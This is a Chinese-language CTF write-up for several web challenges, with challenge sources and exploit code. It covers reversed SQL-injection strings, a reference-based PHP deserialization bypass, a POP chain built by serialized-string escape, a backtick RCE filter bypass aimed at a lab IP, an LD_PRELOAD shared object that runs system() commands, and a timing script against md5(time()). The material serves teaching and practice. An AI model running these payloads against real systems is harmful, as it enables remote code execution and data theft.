ezsql

这道题会把我们输入的语句整体倒序,关键字过滤用双写即可绕过

#"FTCUU"=amehcs_elbat erehw selbat.amehcs_noitamrofni moorrf)eman_elbat(tacnoc_puoorrg,1 tceles noinu)'(   查表

#"galf"=eman_elbat dna "FTCUU"=amehcs_elbat erehw snmuloc.amehcs_noitamrofni moorrf)eman_nmuloc(tacnoc_puoorrg,1 tceles noinu)'(  查列

查数据

#galf moorrf))FTCUU,'~'(sw_tacnoc(tacnoc_puoorrg,1 tceles noinu)'(

phonecode

看题目提示下一次必定命中,然后输入手机号。

只有改变手机号,返回给我们的 hint 才会改变。由此猜测是伪随机数,爆破种子即可。

这几个都试试

发现是2820130815这个种子

将得到的验证码输入即可获取flag

ez_unser

傻逼了,这道题的wakeup不能绕。

<?php
// Render this file's own source to the visitor (highlight_file() is the canonical name; show_source() is its alias).
highlight_file(__FILE__);

###very___so___easy!!!!
// Challenge gadget class: an attacker-controlled serialized object of this
// class reaches eval() in __destruct(). The property declaration order
// (a, b, c) matters because it fixes the slot numbers that R: references in
// the serialized form point at.
class test{
public $a;
public $b;
public $c;
// Defaults only apply to objects built with `new`; unserialize() does not run the constructor.
public function __construct(){
$this->a=1;
$this->b=2;
$this->c=3;
}
// Intended mitigation: blank the eval'd property right after unserialize().
// It only resets the *value* of $a; if $b was serialized as a reference to $a
// (R:), the later assignment to $b in __destruct() writes through into $a again.
public function __wakeup(){
$this->a='';
}
// Runs when the object is released; executes $a as PHP code.
// Assigning $c to $b first is what makes the reference trick above work.
public function __destruct(){
$this->b=$this->c;
eval($this->a);
}
}
// Untrusted input flows straight into unserialize(); the only gate is a
// regex that requires the literal text `test":3` somewhere in the payload.
$a=$_GET['a'];
// Case-insensitive presence check, not a format validation: the substring
// may appear inside any string value of the payload, not only in the header.
if(!preg_match('/test":3/i',$a)){
die("你输入的不正确!!!搞什么!!");
}
// Deserializing attacker-supplied data instantiates `test` and triggers its
// __wakeup()/__destruct(); the safe alternatives are json_decode() or a
// strict `allowed_classes` list (PHP 7+).
$bbb=unserialize($_GET['a']);

这里的正则很简单,只需要在数据里带上能匹配到的内容即可。

这里 PHP 版本是 5.6.28,无法绕过 __wakeup;但题目给了三个属性,而且 __destruct 中还有一次赋值操作,由此就可以想到引用。

让 b 引用 a,这样 __wakeup 把 a 置空后,__destruct 中把 c 赋给 b 时其实也改变了 a。

<?php
// Print this generator's own source (show_source() is an alias of highlight_file()).
highlight_file(__FILE__);

###very___so___easy!!!!
// Payload generator for the challenge above: the serialized form of this
// object carries $b as a reference to $a (R:2), so the target's __wakeup()
// reset of $a is undone when its __destruct() assigns $c to $b.
// Property order must match the target class exactly for the R: slot to line up.
class test{
public $a;
public $b;
public $c;
public function __construct(){
// Carries the text the target's preg_match() gate looks for, inside a string value.
$this->a='test":3';
// Serialized as R:2 — slot 2 is $a (slot 1 is the object itself).
$this->b = &$this->a;
// String that ends up in $a, and therefore in eval(), after the target's __destruct() assignment.
$this->c = "system('ls /');";
}
}

// Emit the serialized payload; serialize() follows the live reference held in $b.
$payload = serialize(new test());
print $payload;

ez_rce

居然都不输入参数,可恶!!!!!!!!!

<?php
## 放弃把,小伙子,你真的不会RCE,何必在此纠结呢????????????
// eval() sink gated by a denylist: the `code` parameter is executed as PHP as
// long as a case-insensitive regex finds none of the listed tokens in it.
if(isset($_GET['code'])){
$code=$_GET['code'];
// Denylist matching on the raw string. A keyword filter in front of eval() is
// not a security boundary — PHP has many equivalent spellings and call forms
// for the same operation; the only robust fix is not to eval() user input.
if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|php|base|echo|cp|\$|\*|\+|\^|scan|\.|local|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$code)){
echo '看看你输入的参数!!!不叫样子!!';echo '<br>';
// Arbitrary PHP execution on whatever passed the filter.
eval($code);
}
else{
die("你想干什么?????????");
}
}
else{
echo "居然都不输入参数,可恶!!!!!!!!!";
// No parameter: show the challenge source instead.
show_source(__FILE__);
}

过滤得比较少,这里可以用转义符绕过关键字

这里可以用反引号执行命令,输出则可以用 print_r 或 var_dump 等

http://43.143.7.97:28824/?code=var_dump(`l\s%09/`);

http://43.143.7.97:28824/?code=var_dump(`c\at%09/fffffffffflagafag`);

uploadandinject

在hint.php内看到提示 .index.php.swp

下载还原。

很熟悉哈,环境变量注入。

LD_PRELOAD是Linux系统的一个环境变量,它可以影响程序运行时的链接(Runtime linker),它允许你定义在程序运行前优先加载的动态链接库。这个功能主要就是用来有选择性地载入不同动态链接库中的相同函数。通过这个环境变量,我们可以在主程序和其动态链接库的中间加载别的动态链接库,甚至覆盖正常的函数库。一方面,我们可以以此功能来使用自己的或是更好的函数(无需别人的源码),而另一方面,我们也可以借此向别人的程序注入代码,从而达到特定的目的。

用人话讲,LD_PRELOAD 是个环境变量,用于动态库的加载,而它指定的动态库加载优先级最高,因此我们可以抢在正常函数执行之前,率先执行我们自己编写的函数。

这里的话参考p牛的一句话。

我是如何利用环境变量注入执行任意命令 - 跳跳糖 (tttang.com)

在有上传点(无需控制文件名)的情况下,这段代码其实比较简单了,可以直接用LD_PRELOAD搞定。上传一个文件名不限的so文件,如hj.jpg,可以通过LD_PRELOAD=/var/www/html/uploads/hj.jpg这样的方法劫持并执行任意代码。

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Constructor of the shared object: the dynamic loader runs it as soon as the
 * library is mapped, before the host program's main(). That is why a library
 * named in LD_PRELOAD executes code inside every process started with that
 * environment, as the write-up above explains.
 * Defender's note: an LD_PRELOAD value pointing into a web upload directory
 * (cf. the path quoted above) is the observable indicator.
 */
__attribute__ ((__constructor__)) void preload (void){
/* Presumably removes the variable so the shell spawned by system() does not
 * preload this library again — confirm; the write-up does not say. Must stay
 * before the system() calls. */
unsetenv("LD_PRELOAD");
system("id");
system("ls /");
}

编译so文件

# Build a position-independent shared object; the write-up then renames it before upload.
gcc -shared -fPIC exp.c -o exp.so

然后更改文件后缀

上传,这里扫描目录扫描到了 /upload/upload.php

然后在首页加载文件即可。

然后修改c文件的内容再编译重复步骤即可。

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/*
 * Second build of the same library, differing only in the command run.
 * The constructor attribute makes the loader execute this before the host
 * program's main() whenever the library is preloaded.
 */
__attribute__ ((__constructor__)) void preload (void){
/* Presumably clears the variable so the shell spawned by system() does not
 * preload this library again — confirm; the write-up does not say. */
unsetenv("LD_PRELOAD");
system("id");
system("cat /flag");
}

ezpop

<?php
//flag in flag.php
// Silences every PHP diagnostic, including the notice from reading
// $_POST["data"] before checking it and the notices unserialize() emits on
// malformed input.
error_reporting(0);
// Entry object for the challenge: built from POST data and then re-serialized
// (see the bottom of the file). $key must equal "UUCTF" for the nested
// unserialize() to run, and the constructor only ever sets $name, so only a
// serialize-string escape can set it.
class UUCTF{
public $name,$key,$basedata,$ob;
function __construct($str){
$this->name=$str;
}
// Called by unserialize(); strict comparison, so $key must be exactly that string.
function __wakeup(){
if($this->key==="UUCTF"){
// Second, unrestricted unserialize() on attacker-shaped data — this is the
// gadget-chain entry point (nothing -> output -> youwant).
$this->ob=unserialize(base64_decode($this->basedata));
}
else{
die("oh!you should learn PHP unserialize String escape!");
}
}
}
// String-conversion gadget: any context that casts this object to string
// (here: die($this->a) in nothing::__destruct) calls rce() on $a.
class output{
public $a;
// Returns nothing — PHP treats a non-string return from __toString() as an
// error, but only after rce() has already run.
function __toString(){
$this->a->rce();
}
}
// Destructor gadget. __wakeup() blanks $a, but if the payload serialized $b as
// a reference to $a (R:), the assignment in __destruct() writes $t back into
// $a, and die() then string-casts it (-> output::__toString).
class nothing{
public $a;
public $b;
public $t;
function __wakeup(){
$this->a="";
}
function __destruct(){
$this->b=$this->t;
die($this->a);
}
}
// Final sink of the chain: evaluates $cmd as PHP. Reached via output::__toString().
class youwant{
public $cmd;
function rce(){
eval($this->cmd);
}
}
// Reads the key before checking it exists; on a missing "data" this emits an
// undefined-index notice (hidden by error_reporting(0)) and $pdata is null.
$pdata=$_POST["data"];
if(isset($pdata))
{
$data=serialize(new UUCTF($pdata));
// Length-changing replacement applied *after* serialize(): "hacker" (6 bytes)
// becomes "loveuu!" (7 bytes) while the s:N: length prefix still says N.
// That mismatch lets the tail of $name be parsed as further properties.
// Safe order is to filter before serializing, or not to round-trip at all.
$data_replace=str_replace("hacker","loveuu!",$data);
unserialize($data_replace);
}else{
highlight_file(__FILE__);
}
?>

这里是字符增加型的反序列化字符串逃逸(hacker 替换为 loveuu! 后变长)。我们需要满足 $this->key==="UUCTF" 这个条件,那么需要逃逸出 ";s:3:"key";s:5:"UUCTF";}

前面闭合、后面闭合。这里需要逃逸 25 个字符,那么就需要 25 个 hacker;但是别忘了,这个类有四个属性,所以还需要把后面两个属性也一并逃逸出来。

";s:3:"key";s:5:"UUCTF";s:8:"basedata";N;s:2:"ob";N;}  一共53个字符。

后续构造pop链

<?php

// Local stand-in for the challenge's UUCTF class, used only to prototype the
// nested payload. Note the property is named $db here whereas the target
// uses $basedata; the author rewrites the name by hand in the escape string.
class UUCTF
{
public $db;
public $ob;



public function __wakeup()
{
// TODO: Implement __wakeup() method.
// Mirrors the target: base64-decode then unserialize the inner object graph.
$this->ob=unserialize(base64_decode($this->db));
}
}


// Copy of the challenge's class, kept in this prototype so the generated
// payload can be unserialized locally. The constructor variant (commented
// out below) is what the author uses to *generate* the serialized string.
class nothing{
public $a;
public $b;
public $t;
function __wakeup(){
$this->a="";
}
// $b=$t writes through to $a when $b was serialized as a reference to $a.
function __destruct(){
$this->b=$this->t;
die($this->a);
}
}


//class nothing{
// public $a;
// public $b;
// public $t;
// public function __construct()
// {
// $this->a = "aaa";
// $this->b = &$this->a;
// $this->t = new output();
// }
//}


// Same gadget as in the challenge, plus a constructor so that `new output()`
// already carries the youwant sink in $a when the graph is serialized.
class output{
public $a;

public function __construct()
{
$this->a = new youwant();
}

function __toString(){
$this->a->rce();
}
}

// Same sink as in the challenge; $cmd is preset here with a harmless probe
// (phpinfo) for testing that the chain fires.
class youwant{
public $cmd;

public function __construct()
{
$this->cmd = "phpinfo();";
}

function rce(){
eval($this->cmd);
}
}

$u = new UUCTF();
// Hand-written inner object graph: nothing{a:"aaa", b:R:2 (reference to a),
// t:output{a:youwant{cmd}}}. Every s:N: prefix must match the byte length of
// the string that follows, and R:2 points at slot 2 = property $a (slot 1 is
// the enclosing object).
$u->db = base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:10:"phpinfo();";}}}');
// Outer wrapper; the author only takes the base64 blob from here and splices
// it into the escape string under the target's real property name, basedata.
echo serialize($u);
调用链: UUCTF::__wakeup -> nothing::__destruct -> output::__toString -> youwant::rce()

注意这里的代码

if($this->key==="UUCTF"){
$this->ob=unserialize(base64_decode($this->basedata));
}
这里需要我们先逃逸出 key 属性,然后 basedata 属性才会被反序列化;注意它还经过了 base64 编码
$u->db = base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:10:"phpinfo();";}}}');
我们需要构造的basedata属性值

然后把需要逃逸的写一下

// Tail spliced into the POST value: the leading `";` closes the truncated
// $name string, then key/basedata/ob follow as properties of the outer
// object. s:172 is the byte length of the base64 blob, and the final `}`
// closes the object so unserialize() ignores whatever trails it.
$str = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:172:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTA6InBocGluZm8oKTsiO319fQ==";s:2:"ob";N;}';
// var_dump() also prints the string length, which is the number of
// "hacker" repetitions the escape needs.
var_dump($str);
data=hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:172:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTA6InBocGluZm8oKTsiO319fQ==";s:2:"ob";N;}

image-20221024215300434

data=hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTM6InN5c3RlbSgnbHMnKTsiO319fQ==";s:2:"ob";N;}

<?php

// Local stand-in for the challenge's UUCTF class (second iteration of the
// generator). $db here corresponds to the target's $basedata; the real
// property name is written by hand into the escape string.
class UUCTF
{
public $db;
public $ob;



public function __wakeup()
{
// TODO: Implement __wakeup() method.
// Mirrors the target: base64-decode then unserialize the inner object graph.
$this->ob=unserialize(base64_decode($this->db));
}
}


//class nothing{
// public $a;
// public $b;
// public $t;
// function __wakeup(){
// $this->a="";
// }
// function __destruct(){
// $this->b=$this->t;
// die($this->a);
// }
//}


// Generator variant of the challenge's `nothing`: the constructor builds the
// object graph so serialize() emits it, with $b as a live reference to $a
// (serialized as R:2). Property order must match the target class.
class nothing{
public $a;
public $b;
public $t;
public function __construct()
{
$this->a = "aaa";
$this->b = &$this->a;
$this->t = new output();
}
}


// Same gadget as in the challenge, plus a constructor so that `new output()`
// already carries the youwant sink in $a when the graph is serialized.
class output{
public $a;

public function __construct()
{
$this->a = new youwant();
}

function __toString(){
$this->a->rce();
}
}

// Same sink as in the challenge; the constructor presets $cmd so serialize()
// emits it (here a directory listing, replaced by hand for the final run).
class youwant{
public $cmd;

public function __construct()
{
$this->cmd = "system('ls');";
}

function rce(){
eval($this->cmd);
}
}

// $u is constructed but unused in this listing (the lines that used it are
// commented out below).
$u = new UUCTF();
// Builds the inner object graph through the constructor variant of `nothing`
// so serialize() emits the R:2 reference for $b automatically.
$n = new nothing();
echo serialize($n);
// The same string written by hand (note the escaped single quotes inside the
// single-quoted literal); its base64 form is what goes into basedata, with
// length s:176.
var_dump(base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:13:"system(\'ls\');";}}}'));
//$u->db = base64_encode('O:7:"nothing":3:{s:1:"a";s:3:"aaa";s:1:"b";R:2;s:1:"t";O:6:"output":1:{s:1:"a";O:7:"youwant":1:{s:3:"cmd";s:10:"phpinfo();";}}}');
//echo serialize($u);
//unserialize('O:5:"UUCTF":2:{s:2:"db";s:172:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTA6InBocGluZm8oKTsiO319fQ==";s:2:"ob";N;}');
//


<?php

// Escape tail for the second payload: identical layout to the earlier one,
// only the base64 blob and its declared length (s:176) changed with $cmd.
$str = '";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:176:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MTM6InN5c3RlbSgnbHMnKTsiO319fQ==";s:2:"ob";N;}';
// var_dump() prints the length too, i.e. how many "hacker" repetitions are needed.
var_dump($str);
data=hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:3:"key";s:5:"UUCTF";s:8:"basedata";s:188:"Tzo3OiJub3RoaW5nIjozOntzOjE6ImEiO3M6MzoiYWFhIjtzOjE6ImIiO1I6MjtzOjE6InQiO086Njoib3V0cHV0IjoxOntzOjE6ImEiO086NzoieW91d2FudCI6MTp7czozOiJjbWQiO3M6MjM6InN5c3RlbSgnY2F0IGZsYWcucGhwJyk7Ijt9fX0=";s:2:"ob";N;}

image-20221024210516911

ez_upload

看了一下是 Apache,不能传 .htaccess,.user.ini 的条件也不满足。继续测试发现用多后缀即可。

backdoor

布里茨贼猛

想到是机器人

查看robots.txt

提示www.zip

后面不会了····

funmd5

<?php
// Challenge: within the same second, the client must supply both a value that
// loosely (==) equals its own md5 and the exact md5 of the current timestamp.
error_reporting(0);
include "flag.php";
$time=time();
$guessmd5=md5($time); // md5 of the current unix timestamp
// `md5` is expected as an array parameter (?md5[0]=...&md5[1]=...); on a plain
// string, $md5[0] would index a single character instead.
$md5=$_GET["md5"];
if(isset($md5)){
$sub=substr($time,-1); // last digit of the timestamp, reused as an offset below
// Rewrites "0e" when the whole string matches; preg_replace() applies this to
// each element of the array. Without the `s`/`D` modifiers `$` also matches
// just before a trailing "\n", so the anchors do not cover every input
// (author's note: a newline gets past it).
$md5=preg_replace('/^(.*)0e(.*)$/','${1}no_science_notation!${2}',$md5);
if(preg_match('/0e/',$md5[0])){
// Reached only when a "0e" survived the rewrite above.
// Drops the first $sub characters of md5[0]. The comparison below is loose
// (==): two numeric strings of the form 0e<digits> both evaluate to 0, so a
// value whose own md5 also starts with 0e passes. md5[1] must equal
// md5(time()) at the moment the request is handled, hence the timing concern
// in the write-up (the author submits for a couple of seconds ahead).
$md5[0]=substr($md5[0],$sub);
// Defensive fix would be === (or hash_equals()) here; == on hex digests is the bug.
if($md5[0]==md5($md5[0])&&$md5[1]===$guessmd5){
echo "well!you win again!now flag is yours.<br>";
echo $flag;
}
else{
echo $md5[0];
echo "oh!no!maybe you need learn more PHP!";
}
}
else{
echo "this is your md5:$md5[0]<br>";
echo "maybe you need more think think!";
}
}
else{
highlight_file(__FILE__);
// $md5 is unset in this branch, so this strlen() runs on null and the result is never used.
$sub=strlen($md5[0]);
// Hint: first five hex characters of md5(time()).
echo substr($guessmd5,0,5)."<br>";
echo "plase give me the md5!";
}
?>
2fff5
plase give me the md5!

编写脚本发送即可。这里要看我们自己的网络延迟了,我这里测试大概两秒左右。

# @Time : 2022/10/25 12:20
# @Author : xiaoqiuxx
# @File : funmd5.py
# @Team : 少年游
import time
import requests
import hashlib


# 这里 0e215962017 做 md5 后开头还是 0e;前面加个 %0a 是绕正则,还有个 1 是为了方便截取。

# Retry loop from the write-up: the challenge accepts md5(time()) only for the
# second in which the request is processed, so the script guesses the server's
# clock (local time + 2 s, the author's measured latency) and keeps sending
# until the response body contains "flag".
for i in range(10000):
    # Guessed server-side time() at arrival.
    times = int(time.time())+2
    print(times)
    times = hashlib.md5(str(times).encode("utf-8")).hexdigest()
    # md5[0] carries the fixed value described in the note above; md5[1] the guessed digest.
    url = f'http://43.143.7.97:28015/?md5[0]=%0a10e215962017&md5[1]={times}'
    resp = requests.get(url=url)
    # No break after a hit, so requests continue until range() is exhausted.
    if "flag" in resp.text:
        print(resp.url)
        print(resp.text)